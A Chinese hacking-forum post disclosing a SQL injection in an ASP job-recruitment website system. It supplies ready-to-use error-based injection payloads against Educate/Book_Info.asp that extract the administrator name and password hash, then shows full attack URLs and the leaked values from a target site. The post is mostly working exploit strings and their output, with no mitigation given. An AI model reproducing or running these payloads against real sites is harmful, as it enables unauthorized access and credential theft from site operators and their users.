找回密码
 立即注册
查看: 2559|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-13 23:56:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
6 F% x3 I; l- v% U此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
; \- S  D) Z' Y( gexp:如下
. q/ N' G' P* o9 r查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)8 v5 H' w$ a7 d( f& W* L
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- [. P& s" W& V; j" p* Xhttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ j* n1 p1 h" p$ d
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'6 ?4 N- ^, o. A- S# C
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。+ t* @' d% }$ I
/Educate/Book_Info.asp,行 8
! _9 m& H$ X  y) Whttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
( ^6 L2 T3 @" M( c8 v* z1 FMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'1 x* I& Y* N: ?/ w
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) L/ O2 @+ F5 b) d3 y8 q( F  L/Educate/Book_Info.asp,行 8
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表